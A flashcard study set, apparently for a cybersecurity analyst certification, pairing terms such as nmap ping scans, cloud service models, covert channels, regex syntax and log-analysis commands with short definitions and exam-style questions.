nmap -sn <IP address>

ping scan to identify which hosts are up and which ones are down (first step)

________ is expressed as a percentage

probability

Risk = (Formula)

probability x magnitude

nmap -PS <PortList> (TCP SYN ping)

probes specific ports from the given listen using a TCP SYN packet instead of an ICMP packet to conduct the ping (useful bc a lot of networks block ICMP packets)

Enumeration

process to identify and scan network ranges and hosts belonging to the target and map out an attack surface (used by both attackers and defenders)

Normalization

process where data is reformatted or restructured to facilitate the scanning and analysis process

Windows Management Instrumentation Command-Line (WMIC- scripting tools)

program used to review log files on a remote Windows machine

Infrastructure as a Service (IaaS)

provides all the hardware, operating system, and backend software needed in order to develop software or services (places the responsibility on the consumer for security of platforms and applications) (cloud service providers are responsible for the CIA of the hardware in the resource pool) (organizational governance is required to control how VMs and containers are provisioned and deprovisioned)

Software as a Service (SaaS)

provides all the hardware, operating system, software, and applications needed for a complete application service to be delivered to the end user (cloud service providers are responsible for the security of the platform and infrastructure) (consumers are responsible for application security, account provisioning, and authorizations)

Committee of Sponsoring Organizations of the Treadway Commission (COSO)

provides guidance on a variety of governance-related topics including fraud, controls, finance, and ethics and relies on COSO's ERM-integrated framework (best practice not a law)

Compensating Control

provides the same (or better) level of protection but uses a different methodology or technology

Platform as a Service (PaaS)

provides your organization with the hardware and software needed for a specific service to operate (consider access control, load balancing, failover, privacy, and protection of data) (always encrypt data stored in a third party solution)

Out-of-band Communication

signals that are sent between two parties or two devices that are sent via a path or method different from that of the primary communication between the two parties or devices

Anti-virus (endpoint protection tool)

software capable of detecting and removing virus infections and (in most cases) other types of malware, such as worms, Trojans, rootkits, adware, spyware, password crackers, network mappers, DoS tools, etc

Data Historian

software that aggregates and catalogs data from multiple sources within an industrial control system (ICS)

Interception Proxy

software that sits between a client and server (MiTM) and allows requests from the client and responses from the server to be analyzed and modified

Decompiler

software that translates a binary or low-level machine language code into higher level code (such as Java)

Fileless Detection Techniques for Malware

techniques that require analysis of the contents of system memory, and of process behavior, rather than relying on scanning the file system

Website Harvesting

techniques used to copy the source code of website files to analyze for information and vulnerabilities

flags (rule options)

tells us whether to match flags in the packet (such as the TCP SYN, the FIN, the reset, etc)

msg (rule options)

text to inform the responder what triggered the rule (basically a comment)

Trusted Execution

the CPU's security extensions invoke a TPM and secure boot attestation to ensure that a trusted operating system is running

Which analysis framework provides the most explicit detail regarding how to mitigate or detect a given threat?

the MITRE ATT&CK Framework

| (regex syntax)

the OR logical operator to match conditions as "this or that"

Port Forwarding

the attacker uses a host as a pivot and is then able to access one of its open TCP/IP ports to send traffic from this port to a port of a host on a different subnet

Enterprise Risk Management (ERM)

the comprehensive process of evaluating, measuring, and mitigating the many risks that pervade an organization

Crash Dump (System Memory Image Acquisition)

the contents of memory are written to a dump file when Windows encounters an unrecoverable kernel error

Dynamic Analysis

the execution of a compiled program to analyze the way it executes and interacts with a system or network (e.g, debugger, stress test, fuzzing)

head syslog.txt

the first 10 lines of the syslog.txt file is displayed

Phishing

the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers

HTTP Response Codes (URL Analysis)

the header value returned by a server when a client requests a URL (*dont need to memorize codes for exam*)

systemd

the init daemon in Linux that is first executed by the kernel during the boot up process and always has the process ID (PID) of 1

tail syslog.txt

the last 10 lines of the syslog.txt file is displayed

Work Recovery Time (WRT)

the length of time in addition to the RTO of individual systems to perform reintegration and testing of a restored or upgraded system following an event

Recovery Time Objective (RTO)

the length of time it takes AFTER an event to resume normal business operations and activities

Evaluate the following log entry: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Based on this log entry, which of the following statements is true?

the packet was blocked inbound to the network

Pre- and Post-admission Control

the point at which client devices are granted or denied access based on their compliance with a health policy

Time of Check to Time of Use (TOCTTOU)

the potential vulnerability that occurs when there is a change between when an app checked a resource and when the app used the resource (the vulnerability will make the change invalidate the check that was already made)

Asset Tagging

the practice of assigning an ID to assets to associate them with entries in an inventory database

Steganography

the practice of concealing data within another file, message, image, or video

Privilege Escalation

the practice of exploiting flaws in an operating system or other application to gain a greater level of access than was intended for the user or application (phishing campaign)

GET (URL Analysis)

the principal method used with HTTP and is used to retrieve a resource

Data Sovereignty (Data Policies)

the principle that countries and states may impose individual requirements on data collected or stored within their jurisdiction

Data Minimization (Data Policies)

the principle that only necessary and sufficient personal information can be collection and processed for the stated purpose

Purpose Limitation (Data Policies)

the principle that personal information can be collected and processed only for a stated purpose to which the subject has consented (will restrict your ability to transfer data to third parties)

Remediation

the process and procedures that occur if a device does not meet the minimum security policy

Mobile Device Management (MDM)

the process and supporting technologies for tracking, controlling, and securing the organization's mobile infrastructure

System Hardening

the process by which a host or other device is made more secure through the reduction of that device's attack surface area

Data Exfiltration

the process by which an attacker takes data that is stored inside of a private network and moves it to an external network

Reverse Engineering

the process of analyzing the structure of hardware or software to reveal more about how it functions

Security Regression Testing

the process of checking that updates to code do not compromise existing security functionality or capability (enables identification of security mechanisms that worked before but are now broken after the latest changes)

Trend Analysis

the process of detecting patterns within a dataset over time, and using those patterns to make predictions about future events or better understand past events

Hardware Source Authenticity

the process of ensuring that hardware is procured tamper-free from trustworthy suppliers

Piping (|)

the process of using the output of one command as the input for a second command

Change Management

the process through which changes to the configuration of information systems are monitored and controlled, as part of the organization's overall configuration management efforts (focuses on configuration information, patches installed, backup records, incident reports/issues)

Chain of Custody

the record of evidence history from collection, to presentation in court, to disposal

$ (regex syntax)

the regex will only match at the end of a line when searching

^ (regex syntax)

the regex will only match at the start of a line when searching (anchor/boundary character)

Artificial Intelligence (AI)

the science of creating machines with the ability to develop problem solving and analysis strategies without significant human direction or intervention

krbtgt hash

the trust anchor of the Active Directory domain which functions like a private key of a root certificate authority and generates ticket-granting tickets (TGT) that are used by users to access services within Kerberos

Credentialed Scan (Vulnerability Scanner Types)

the vulnerability scanner is given user accounts to log-on to the target systems or hosts (likely to find vulnerabilities and misconfigurations)

Non-credentialed Scan (Vulnerability Scanner Types)

the vulnerability scanner sends test packets against a target without logging onto the system or host (are more appropriate for external assessment of the network perimeter)

Cellebrite (Mobile Device Forensics)

tool focused on evidence extraction from smartphone and other mobile devices, including older feature phones, and from cloud data and metadata using a universal forensic extraction device (UFED)

crontab (crontab -l)

tool that manages cron jobs, the Linux equivalent of scheduled tasks (on Windows)

Service Analysis Tools for Windows

tools that can help identify suspicious service activity even when anti-malware scanners fail to identify it

Dark Nets

unused physical network ports or unused IP address space within a local network often used by attackers

What is an effective way to synchronize time for our logs in a SIEM?

use Coordinated Universal Time (UTC) (time standard not a time zone)

How do you mitigate against different kinds of Covert Channels?

use advanced intrusion detection and user behavior analytics tools are the best option to detecting covert channels, but they will not detect everything

Traceroute (hping)

use arbitrary packet formats, such as probing DNS ports using TCP or UDP, to perform traces when ICMP is blocked on a given network

How do you mitigate rouge devices on your network?

use digital certificates on endpoints and servers to authenticate and encrypt traffic using IPsec or HTTPS

Quotes (" ")

use double quotes to specify an exact phrase and make a search more precise

Social Media Websites (Beaconing)

use of social media platforms messaging functions allow an attacker to live off the land (attackers don't have to create their own tools, instead they send their messages through the social medias APIs and its harder to detect)

What is the best mitigation strategy for data exfiltration?

use strong encryption of data at rest and data in transit

NOT operator

use the minus sign in front of a word or quoted phrase to exclude results that contain that string

AND/OR operator

use these logical operators to require both search items (AND) or to require either search item (OR)

Discovery Scan

used to create and update an inventory of assets by conducting enumeration of the network and its targets without scanning for vulnerabilities (similar to nmap scan) (ping sweep of network)

Timestamping (hping)

used to determine the system's uptime

DELETE (URL Analysis)

used to remove the requested resource

POST (URL Analysis)

used to send data to the server for processing by the requested resource

Framework Profiles

used to supply statements of current cybersecurity outcomes and target cybersecurity outcomes to identify investments that will be most productive in closing the gap in cybersecurity capabilities shown by comparison of the current and target profiles (essentially you want to look at your organization and you want to capture a baseline of where you are in terms of the framework right now - are you low quality or high quality?)

a _______ rootkit might have administrator-level privileges but uses OS features for persistence

user mode

Memorandum of Understanding (MOU)

usually a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money

Query parameters (URL Analysis)

usually formatted as one or more name=value pairs with '&' delimiting each pair

Covert Timing Channel

utilizes one process to alter a system resource so that changes in its response time can signal information to a recipient process

Covert Storage Channel

utilizes one process to write to a storage location and another process to read from that location (by splitting up these processes this type of covert channel cannot be detected by the operating system kernel)

Nikto

vulnerability scanner that can be used to identify known web server vulnerabilities and misconfigurations, identify web applications running on a server, and identify potential known vulnerabilities in those web applications

grep "NetworkManager" /var/log/syslog | cut -d " " -f1-5 | sort -t " " -k3

we are going to search for the word "Network Manager" inside the file, /var/log/syslog (so anytime I find NetworkManager in that syslog file we are going to pipe it and send it to the next command)

How do you mitigate against application-based attacks?

web application firewall (WAF)

Vulnerability scans should be performed at least ________

weekly

When does an injection attack occur?

when the attacker inserts malicious code through an application interface

You are a cybersecurity analyst who has been given the output from a system administrator's Linux terminal. Based on the output provided, which of the following statements is correct? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- BEGIN OUTPUT ———————--------- # nmap win2k16.local Nmap scan report for win2k16 (192.168.2.15) Host is up (0.132452s latency) Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http # nc win2k16.local 80 220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1) # nc win2k16.local 22 SSH-2.0-OpenSSH_7.2 Debian-2 # ———————--------- END OUTPUT

your email is running on a non-standard port


Related study sets

Pharmacology Chapter 20 study set

View Set

APW Unit 6--Topic 6.7 & 6.8 Impact of Migration

View Set

Chapter 19/2: Florida General Review ctd

View Set

N503 - GI and Neuro Practice Test Questions

View Set

Adult Health Chapter 22: Nursing Management: Patients With Oral and Esophageal Disorders and Patients Receiving Gastrointestinal Intubation, Enteral, and Parenteral Nutrition

View Set